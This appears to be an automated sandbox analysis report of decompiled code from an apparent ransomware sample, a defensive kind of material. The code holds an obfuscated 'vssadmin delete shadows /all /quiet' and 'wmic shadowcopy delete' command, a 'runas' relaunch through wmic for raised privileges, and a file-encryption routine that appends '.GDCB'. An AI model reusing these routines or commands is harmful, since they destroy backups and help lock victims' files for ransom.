                                      				_t382 =  *(0x40ba40 + (_t512 & 0x000000ff) * 4) ^  *(0x40b240 + (_t449 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t449 >> 0x00000010 & 0x000000ff) * 4) ^  *_t739;
                                      				_t452 =  *(0x40b240 + (_t447 & 0x000000ff) * 4) ^  *(0x40b640 + (_t449 & 0x000000ff) * 4) ^  *(0x40be40 + (_t512 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t739[1];
                                      				_t740 =  &(_t739[4]);
                                      				 *_t820 = _t740;
                                      				asm("rol eax, 0x10");
                                      				_t454 = _t452 & 0xffff0000 | _t382 >> 0x00000010;
                                      				_t521 = _t520 >> 0x10;
                                      				_t529 = _t740[2] ^  *(0x40b240 + (_t520 & 0x000000ff) * 4) ^  *(0x40b640 + (_t452 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t382 & 0x000000ff) * 4) ^  *0x0040C1F4;
                                      				_t752 =  *_t820;
                                      				_t390 =  *(0x40ba40 + (_t521 & 0x000000ff) * 4) ^  *(0x40b240 + (_t454 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t454 >> 0x00000010 & 0x000000ff) * 4) ^  *_t752;
                                      				_t457 =  *(0x40b240 + (_t452 & 0x000000ff) * 4) ^  *(0x40b640 + (_t454 & 0x000000ff) * 4) ^  *(0x40be40 + (_t521 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t752[1];
                                      				_t753 =  &(_t752[4]);
                                      				 *_t820 = _t753;
                                      				asm("rol eax, 0x10");
                                      				_t459 = _t457 & 0xffff0000 | _t390 >> 0x00000010;
                                      				_t530 = _t529 >> 0x10;
                                      				_t538 = _t753[2] ^  *(0x40b240 + (_t529 & 0x000000ff) * 4) ^  *(0x40b640 + (_t457 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t390 & 0x000000ff) * 4) ^  *0x0040C1F4;
                                      				_t765 =  *_t820;
                                      				_t398 =  *(0x40ba40 + (_t530 & 0x000000ff) * 4) ^  *(0x40b240 + (_t459 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t459 >> 0x00000010 & 0x000000ff) * 4) ^  *_t765;
                                      				_t462 =  *(0x40b240 + (_t457 & 0x000000ff) * 4) ^  *(0x40b640 + (_t459 & 0x000000ff) * 4) ^  *(0x40be40 + (_t530 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t765[1];
                                      				_t766 =  &(_t765[4]);
                                      				 *_t820 = _t766;
                                      				asm("rol eax, 0x10");
                                      				_t464 = _t462 & 0xffff0000 | _t398 >> 0x00000010;
                                      				_t539 = _t538 >> 0x10;
                                      				_t547 = _t766[2] ^  *(0x40b240 + (_t538 & 0x000000ff) * 4) ^  *(0x40b640 + (_t462 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t398 & 0x000000ff) * 4) ^  *0x0040C1F4;
                                      				_t778 =  *_t820;
                                      				_t406 =  *(0x40ba40 + (_t539 & 0x000000ff) * 4) ^  *(0x40b240 + (_t464 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t464 >> 0x00000010 & 0x000000ff) * 4) ^  *_t778;
                                      				_t467 =  *(0x40b240 + (_t462 & 0x000000ff) * 4) ^  *(0x40b640 + (_t464 & 0x000000ff) * 4) ^  *(0x40be40 + (_t539 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t778[1];
                                      				_t779 =  &(_t778[4]);
                                      				 *_t820 = _t779;
                                      				asm("rol eax, 0x10");
                                      				_t469 = _t467 & 0xffff0000 | _t406 >> 0x00000010;
                                      				_t548 = _t547 >> 0x10;
                                      				_t556 = _t779[2] ^  *(0x40b240 + (_t547 & 0x000000ff) * 4) ^  *(0x40b640 + (_t467 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t406 & 0x000000ff) * 4) ^  *0x0040C1F4;
                                      				_t791 =  *_t820;
                                      				_t414 =  *(0x40ba40 + (_t548 & 0x000000ff) * 4) ^  *(0x40b240 + (_t469 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t469 >> 0x00000010 & 0x000000ff) * 4) ^  *_t791;
                                      				_t472 =  *(0x40b240 + (_t467 & 0x000000ff) * 4) ^  *(0x40b640 + (_t469 & 0x000000ff) * 4) ^  *(0x40be40 + (_t548 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t791[1];
                                      				_t792 =  &(_t791[4]);
                                      				 *_t820 = _t792;
                                      				asm("rol eax, 0x10");
                                      				_t474 = _t472 & 0xffff0000 | _t414 >> 0x00000010;
                                      				_t557 = _t556 >> 0x10;
                                      				_t475 = _t474 >> 0x10;
                                      				_t565 = _t792[2] ^  *(0x40b240 + (_t556 & 0x000000ff) * 4) ^  *(0x40b640 + (_t472 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t414 & 0x000000ff) * 4) ^  *0x0040C1F4;
                                      				_t804 =  *_t820;
                                      				_t422 =  *(0x40ba40 + (_t557 & 0x000000ff) * 4) ^  *(0x40b240 + (_t474 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t475 & 0x000000ff) * 4) ^  *_t804;
                                      				_t477 =  *(0x40b240 + (_t472 & 0x000000ff) * 4) ^  *(0x40b640 + (_t474 & 0x000000ff) * 4) ^  *(0x40be40 + (_t557 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t804[1];
                                      				_t805 =  &(_t804[4]);
                                      				 *_t820 = _t805;
                                      				asm("rol eax, 0x10");
                                      				_t479 = _t477 & 0xffff0000 | _t422 >> 0x00000010;
                                      				_t566 = _t565 >> 0x10;
                                      				_t480 = _t479 >> 0x10;
                                      				_t594 = (_t792[3] ^  *0x0040B340 ^  *(0x40b640 + (_t556 & 0x000000ff) * 4) ^  *(0x40be40 + (_t414 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t475 & 0x000000ff) * 4)) >> 0x10;
                                      				_t817 =  *_t820;
                                      				_t818 = _t820[7];
                                      				 *_t818 =  *(0x40ca40 + (_t566 & 0x000000ff) * 4) ^  *(0x40c240 + (_t479 & 0x000000ff) * 4) ^  *0x0040C9F4 ^  *(0x40ce40 + (_t480 & 0x000000ff) * 4) ^  *_t817;
                                      				_t818[1] =  *(0x40c240 + (_t477 & 0x000000ff) * 4) ^  *(0x40c640 + (_t479 & 0x000000ff) * 4) ^  *(0x40ce40 + (_t566 & 0x000000ff) * 4) ^  *(0x40ca40 + (_t594 & 0x000000ff) * 4) ^ _t817[1];
                                      				_t818[2] = _t805[2] ^  *(0x40c240 + (_t565 & 0x000000ff) * 4) ^  *(0x40c640 + (_t477 & 0x000000ff) * 4) ^  *(0x40ca40 + (_t422 & 0x000000ff) * 4) ^  *(0x40ce40 + (_t594 & 0x000000ff) * 4);
                                      				_t818[3] = _t805[3] ^  *0x0040C340 ^  *(0x40c640 + (_t565 & 0x000000ff) * 4) ^  *(0x40ce40 + (_t422 & 0x000000ff) * 4) ^  *(0x40ca40 + (_t480 & 0x000000ff) * 4);
                                      				return 0;
                                      			}










































































                                      0x00402000
                                      0x00402004
                                      0x0040202c
                                      0x0040202e
                                      0x00402093
                                      0x00402097
                                      0x0040209a
                                      0x0040209d
                                      0x004020a0
                                      0x004020a3
                                      0x004020ac
                                      0x004020fe
                                      0x00402100
                                      0x00402165
                                      0x00402169
                                      0x0040216c
                                      0x0040216f
                                      0x00402172
                                      0x00402175
                                      0x0040217e
                                      0x004021d0
                                      0x004021d2
                                      0x00402237
                                      0x0040223b
                                      0x0040223e
                                      0x00402241
                                      0x00402244
                                      0x00402247
                                      0x00402250
                                      0x004022a2
                                      0x004022a4
                                      0x00402309
                                      0x0040230d
                                      0x00402310
                                      0x00402313
                                      0x00402316
                                      0x00402319
                                      0x00402322
                                      0x00402374
                                      0x00402376
                                      0x004023db
                                      0x004023df
                                      0x004023e2
                                      0x004023e5
                                      0x004023e8
                                      0x004023eb
                                      0x004023f4
                                      0x00402446
                                      0x00402448
                                      0x004024ad
                                      0x004024b1
                                      0x004024b4
                                      0x004024b7
                                      0x004024ba
                                      0x004024bd
                                      0x004024c6
                                      0x00402518
                                      0x0040251a
                                      0x0040257f
                                      0x00402583
                                      0x00402586
                                      0x00402589
                                      0x0040258c
                                      0x0040258f
                                      0x00402598
                                      0x004025ea
                                      0x004025ec
                                      0x00402651
                                      0x00402655
                                      0x00402658
                                      0x0040265b
                                      0x0040265e
                                      0x00402661
                                      0x0040266a
                                      0x004026bc
                                      0x004026be
                                      0x004026f3
                                      0x00402723
                                      0x00402727
                                      0x0040272a
                                      0x0040272d
                                      0x00402730
                                      0x00402733
                                      0x0040273c
                                      0x0040278e
                                      0x00402790
                                      0x004027c5
                                      0x004027c8
                                      0x004027f5
                                      0x004027fe
                                      0x00402802
                                      0x00402805
                                      0x00402808
                                      0x0040280b
                                      0x00402823

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bfb29fffba2aa599f78320690fab8034409311693ae914370aca9bd705b80840
                                      • Instruction ID: f9b15c0d718e0cc2e1350faee993976694927ec24e5c352504746a76a05f8bcd
                                      • Opcode Fuzzy Hash: bfb29fffba2aa599f78320690fab8034409311693ae914370aca9bd705b80840
                                      • Instruction Fuzzy Hash: 1E220F31D1066C8FDB84EF6EEDA403673A1E744311B47053AAB81BB5A1D734B620ABDC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E00404330(void* __eflags) {
                                      				short _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				char _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				intOrPtr _v104;
                                      				intOrPtr _v108;
                                      				intOrPtr _v112;
                                      				intOrPtr _v116;
                                      				char _v120;
                                      				short _v124;
                                      				intOrPtr _v128;
                                      				intOrPtr _v132;
                                      				intOrPtr _v136;
                                      				intOrPtr _v140;
                                      				intOrPtr _v144;
                                      				intOrPtr _v148;
                                      				char _v152;
                                      				short _v156;
                                      				intOrPtr _v160;
                                      				intOrPtr _v164;
                                      				intOrPtr _v168;
                                      				char _v172;
                                      				short* _v176;
                                      				short* _t51;
                                      				WCHAR* _t59;
                                      				void* _t62;
                                      				signed int _t66;
                                      				void* _t69;
                                      
                                      				if(E00403AE0(_t62) == 0) {
                                      					_v172 = 0x63005c;
                                      					_v168 = 0x64006d;
                                      					_v8 = 0;
                                      					_t59 =  &_v172;
                                      					_v164 = 0x65002e;
                                      					_t51 =  &_v84;
                                      					_v160 = 0x650078;
                                      					_v156 = 0;
                                      					_v84 = 0x63002f;
                                      					_v80 = 0x760020;
                                      					_v76 = 0x730073;
                                      					_v72 = 0x640061;
                                      					_v68 = 0x69006d;
                                      					_v64 = 0x20006e;
                                      					_v60 = 0x650064;
                                      					_v56 = 0x65006c;
                                      					_v52 = 0x650074;
                                      					_v48 = 0x730020;
                                      					_v44 = 0x610068;
                                      					_v40 = 0x6f0064;
                                      					_v36 = 0x730077;
                                      					_v32 = 0x2f0020;
                                      					_v28 = 0x6c0061;
                                      					_v24 = 0x20006c;
                                      					_v20 = 0x71002f;
                                      					_v16 = 0x690075;
                                      					_v12 = 0x740065;
                                      				} else {
                                      					_v152 = 0x77005c;
                                      					_v148 = 0x650062;
                                      					_t59 =  &_v152;
                                      					_v144 = 0x5c006d;
                                      					_t51 =  &_v120;
                                      					_v140 = 0x6d0077;
                                      					_v136 = 0x630069;
                                      					_v132 = 0x65002e;
                                      					_v128 = 0x650078;
                                      					_v124 = 0;
                                      					_v120 = 0x680073;
                                      					_v116 = 0x640061;
                                      					_v112 = 0x77006f;
                                      					_v108 = 0x6f0063;
                                      					_v104 = 0x790070;
                                      					_v100 = 0x640020;
                                      					_v96 = 0x6c0065;
                                      					_v92 = 0x740065;
                                      					_v88 = 0x65;
                                      				}
                                      				_v176 = _t51;
                                      				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
                                      				if(_t69 != 0) {
                                      					GetSystemDirectoryW(_t69, 0x100);
                                      					lstrcatW(_t69, _t59);
                                      					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
                                      					asm("sbb edi, edi");
                                      					_t66 =  ~0x20;
                                      				} else {
                                      					_t66 = 0;
                                      				}
                                      				VirtualFree(_t69, 0, 0x8000);
                                      				return _t66;
                                      			}



















































                                      0x00404346
                                      0x004043e2
                                      0x004043ec
                                      0x004043f4
                                      0x004043fc
                                      0x00404400
                                      0x00404408
                                      0x0040440c
                                      0x00404414
                                      0x00404419
                                      0x00404421
                                      0x00404429
                                      0x00404431
                                      0x00404439
                                      0x00404441
                                      0x00404449
                                      0x00404454
                                      0x0040445f
                                      0x0040446a
                                      0x00404475
                                      0x00404480
                                      0x0040448b
                                      0x00404496
                                      0x004044a1
                                      0x004044ac
                                      0x004044b7
                                      0x004044c2
                                      0x004044cd
                                      0x0040434c
                                      0x0040434e
                                      0x00404356
                                      0x0040435e
                                      0x00404362
                                      0x0040436a
                                      0x0040436e
                                      0x00404376
                                      0x0040437e
                                      0x00404386
                                      0x0040438e
                                      0x00404393
                                      0x0040439b
                                      0x004043a3
                                      0x004043ab
                                      0x004043b3
                                      0x004043bb
                                      0x004043c3
                                      0x004043cb
                                      0x004043d3
                                      0x004043d3
                                      0x004044e6
                                      0x004044f5
                                      0x004044f9
                                      0x00404505
                                      0x0040450d
                                      0x00404523
                                      0x0040452b
                                      0x0040452d
                                      0x004044fb
                                      0x004044fb
                                      0x004044fb
                                      0x00404537
                                      0x00404545

                                      APIs
                                        • Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
                                        • Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 004044EF
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 00404505
                                      • lstrcatW.KERNEL32(00000000,0063005C), ref: 0040450D
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 00404523
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404537
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                      • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                      • API String ID: 2684037697-4098772853
                                      • Opcode ID: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
                                      • Instruction ID: b655391ad336c4b4d1e3433ef327ff3d08d390bc764b3395417c8c24b6d0b817
                                      • Opcode Fuzzy Hash: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
                                      • Instruction Fuzzy Hash: 7D41FAB0248380DFE3208F119949B5BBEE6BBC5B49F10491DE6985A291C7F6854CCF9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403BA0(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v1020;
                                      				short _v1028;
                                      				char _v1532;
                                      				short _v1540;
                                      				intOrPtr _v1548;
                                      				intOrPtr _v1552;
                                      				intOrPtr _v1556;
                                      				intOrPtr _v1560;
                                      				intOrPtr _v1564;
                                      				intOrPtr _v1568;
                                      				intOrPtr _v1572;
                                      				intOrPtr _v1576;
                                      				intOrPtr _v1580;
                                      				intOrPtr _v1584;
                                      				intOrPtr _v1588;
                                      				intOrPtr _v1592;
                                      				intOrPtr _v1596;
                                      				intOrPtr _v1600;
                                      				intOrPtr _v1604;
                                      				intOrPtr _v1608;
                                      				intOrPtr _v1612;
                                      				intOrPtr _v1616;
                                      				short _v1620;
                                      				intOrPtr _v1624;
                                      				intOrPtr _v1628;
                                      				intOrPtr _v1632;
                                      				intOrPtr _v1636;
                                      				intOrPtr _v1640;
                                      				intOrPtr _v1644;
                                      				intOrPtr _v1648;
                                      				intOrPtr _v1652;
                                      				intOrPtr _v1656;
                                      				intOrPtr _v1660;
                                      				intOrPtr _v1664;
                                      				intOrPtr _v1668;
                                      				intOrPtr _v1672;
                                      				short _v1676;
                                      				char _v1680;
                                      				int _t54;
                                      				struct HWND__* _t62;
                                      				long _t66;
                                      				void* _t76;
                                      				void* _t78;
                                      				void* _t80;
                                      
                                      				_t78 = __ecx;
                                      				_t54 = E00403AE0(__edx);
                                      				if(_t54 != 0) {
                                      					_t54 = E00403A60();
                                      					if(_t54 == 0) {
                                      						_v1676 = 0x770025;
                                      						_v1672 = 0x6e0069;
                                      						_v1668 = 0x690064;
                                      						_v1664 = 0x250072;
                                      						_v1660 = 0x73005c;
                                      						_v1656 = 0x730079;
                                      						_v1652 = 0x650074;
                                      						_v1648 = 0x33006d;
                                      						_v1644 = 0x5c0032;
                                      						_v1640 = 0x620077;
                                      						_v1636 = 0x6d0065;
                                      						_v1632 = 0x77005c;
                                      						_v1628 = 0x69006d;
                                      						_v1624 = 0x63;
                                      						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
                                      						_v1620 = 0x720070;
                                      						_v1616 = 0x63006f;
                                      						_v1612 = 0x730065;
                                      						_v1608 = 0x200073;
                                      						_v1604 = 0x610063;
                                      						_v1600 = 0x6c006c;
                                      						_v1596 = 0x630020;
                                      						_v1592 = 0x650072;
                                      						_v1588 = 0x740061;
                                      						_v1584 = 0x200065;
                                      						_v1580 = 0x630022;
                                      						_v1576 = 0x64006d;
                                      						_v1572 = 0x2f0020;
                                      						_v1568 = 0x200063;
                                      						_v1564 = 0x740073;
                                      						_v1560 = 0x720061;
                                      						_v1556 = 0x200074;
                                      						_v1552 = 0x730025;
                                      						_v1548 = 0x22;
                                      						wsprintfW( &_v1028,  &_v1620, _t78);
                                      						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
                                      						 *_t76 = 0x3c;
                                      						 *(_t76 + 4) = 0x40;
                                      						_t62 = GetForegroundWindow();
                                      						_t80 = 0;
                                      						 *(_t76 + 8) = _t62;
                                      						_v1680 = 0x750072;
                                      						_v1676 = 0x61006e;
                                      						_v1672 = 0x73;
                                      						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
                                      						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
                                      						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
                                      						 *(_t76 + 0x18) = 0;
                                      						 *(_t76 + 0x1c) = 0;
                                      						 *(_t76 + 0x20) = 0;
                                      						while(1) {
                                      							_t66 = ShellExecuteExW(_t76);
                                      							if(_t66 != 0) {
                                      								break;
                                      							}
                                      							_t80 = _t80 + 1;
                                      							if(_t80 < 0x64) {
                                      								continue;
                                      							}
                                      							_t54 = VirtualFree(_t76, _t66, 0x8000);
                                      							goto L6;
                                      						}
                                      						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
                                      						CloseHandle( *(_t76 + 0x38));
                                      						ExitProcess(0);
                                      					}
                                      				}
                                      				L6:
                                      				return _t54;
                                      			}















































                                      0x00403baf
                                      0x00403bb1
                                      0x00403bb8
                                      0x00403bbe
                                      0x00403bc5
                                      0x00403bd7
                                      0x00403be4
                                      0x00403bed
                                      0x00403bf5
                                      0x00403bfd
                                      0x00403c05
                                      0x00403c0d
                                      0x00403c15
                                      0x00403c1d
                                      0x00403c25
                                      0x00403c2d
                                      0x00403c35
                                      0x00403c3d
                                      0x00403c45
                                      0x00403c4d
                                      0x00403c58
                                      0x00403c68
                                      0x00403c71
                                      0x00403c79
                                      0x00403c81
                                      0x00403c89
                                      0x00403c91
                                      0x00403c99
                                      0x00403ca1
                                      0x00403ca9
                                      0x00403cb4
                                      0x00403cbf
                                      0x00403cca
                                      0x00403cd5
                                      0x00403ce0
                                      0x00403ceb
                                      0x00403cf6
                                      0x00403d01
                                      0x00403d0c
                                      0x00403d17
                                      0x00403d31
                                      0x00403d33
                                      0x00403d39
                                      0x00403d40
                                      0x00403d4c
                                      0x00403d4e
                                      0x00403d55
                                      0x00403d5d
                                      0x00403d65
                                      0x00403d6d
                                      0x00403d77
                                      0x00403d81
                                      0x00403d84
                                      0x00403d8b
                                      0x00403d92
                                      0x00403da0
                                      0x00403da1
                                      0x00403da5
                                      0x00000000
                                      0x00000000
                                      0x00403da7
                                      0x00403dab
                                      0x00000000
                                      0x00000000
                                      0x00403db4
                                      0x00000000
                                      0x00403db4
                                      0x00403dc6
                                      0x00403dcf
                                      0x00403dd7
                                      0x00403dd7
                                      0x00403bc5
                                      0x00403dba
                                      0x00403dc0

                                      APIs
                                        • Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
                                        • Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85
                                        • Part of subcall function 00403A60: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403C4D
                                      • wsprintfW.USER32 ref: 00403D17
                                      • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 00403D2B
                                      • GetForegroundWindow.USER32 ref: 00403D40
                                      • ShellExecuteExW.SHELL32(00000000), ref: 00403DA1
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403DB4
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403DC6
                                      • CloseHandle.KERNEL32(?), ref: 00403DCF
                                      • ExitProcess.KERNEL32 ref: 00403DD7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                      • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                      • API String ID: 561366689-3790645798
                                      • Opcode ID: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
                                      • Instruction ID: cc7589b939d66cedc96280ec9e713ba096b07f437b5f45324ccf50025119f88d
                                      • Opcode Fuzzy Hash: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
                                      • Instruction Fuzzy Hash: FF515CB0108341DFE3208F11C94878BBFF9BF84749F00492DE5989A292D7FA9558CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 83%
                                      			E004035E0(WCHAR* __ecx, void* __edx, void* __eflags) {
                                      				signed int _v8;
                                      				long _v12;
                                      				long _v16;
                                      				long _v20;
                                      				long _v24;
                                      				void* _v28;
                                      				WCHAR* _v32;
                                      				void* _v36;
                                      				long _v40;
                                      				void* _v44;
                                      				void* _v48;
                                      				WCHAR* _v52;
                                      				void* _v56;
                                      				void* _v60;
                                      				signed int _v64;
                                      				void _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				short _v80;
                                      				long _v84;
                                      				char _v88;
                                      				char _v104;
                                      				char _v108;
                                      				char _v140;
                                      				char _v388;
                                      				void* _t92;
                                      				void* _t93;
                                      				void* _t95;
                                      				void* _t100;
                                      				void* _t106;
                                      				long _t121;
                                      				long _t122;
                                      				void* _t123;
                                      				long _t125;
                                      				WCHAR* _t139;
                                      				void* _t142;
                                      				void* _t145;
                                      				void* _t147;
                                      				WCHAR* _t158;
                                      				WCHAR* _t160;
                                      				void* _t161;
                                      				void* _t162;
                                      				void _t164;
                                      				long _t165;
                                      				void* _t167;
                                      				void* _t169;
                                      				void* _t170;
                                      				void* _t171;
                                      
                                      				_t139 = __ecx;
                                      				_t162 = __edx;
                                      				_v52 = __ecx;
                                      				SetFileAttributesW(_t139, GetFileAttributesW(__ecx) & 0xfffffffe);
                                      				_v20 = 0;
                                      				_v40 = 0;
                                      				_t147 = _t162;
                                      				E00405EA0(_t147, 0, 0,  &_v20,  &_v40);
                                      				_t158 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                      				_v80 = 0x47002e;
                                      				_v32 = _t158;
                                      				_v76 = 0x430044;
                                      				_v72 = 0x42;
                                      				lstrcpyW(_t158, _t139);
                                      				lstrcatW(_t158,  &_v80);
                                      				asm("movdqa xmm0, [0x410950]");
                                      				asm("movdqu [ebp-0x88], xmm0");
                                      				_push(_t147);
                                      				asm("movdqa xmm0, [0x410950]");
                                      				asm("movdqu [ebp-0x78], xmm0");
                                      				_v108 = 0;
                                      				asm("movdqa xmm0, [0x410950]");
                                      				asm("movdqu [ebp-0x64], xmm0");
                                      				E00407DB0( &_v104, 0x10);
                                      				E00407DB0( &_v140, 0x20);
                                      				_t92 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                      				asm("movdqu xmm0, [ebp-0x88]");
                                      				asm("movdqu [ebx], xmm0");
                                      				asm("movdqu xmm0, [ebp-0x78]");
                                      				_v44 = _t92;
                                      				asm("movdqu [ebx+0x10], xmm0");
                                      				_t93 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                      				asm("movdqu xmm0, [ebp-0x64]");
                                      				_t159 = _t93;
                                      				_v48 = _t93;
                                      				asm("movdqu [edi], xmm0");
                                      				_v88 = 0x20;
                                      				_v84 = 0x10;
                                      				_t95 = E00406000(_v20, _v40, _t92,  &_v88, 0x800);
                                      				_t169 = _t167 + 0x18;
                                      				if(_t95 == 0) {
                                      					L22:
                                      					_t160 = _v32;
                                      					asm("xorps xmm0, xmm0");
                                      					asm("movlpd [ebp-0x40], xmm0");
                                      					_t164 = _v68;
                                      					_v8 = _v64;
                                      					L23:
                                      					VirtualFree(_t160, 0, 0x8000);
                                      					return _t164;
                                      				}
                                      				_t100 = E00406000(_v20, _v40, _t159,  &_v84, 0x800);
                                      				_t170 = _t169 + 0x14;
                                      				if(_t100 != 0) {
                                      					E00407EE0( &_v140,  &_v388);
                                      					_t171 = _t170 + 8;
                                      					_t142 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
                                      					_v36 = _t142;
                                      					if(_t142 == 0xffffffff) {
                                      						goto L22;
                                      					}
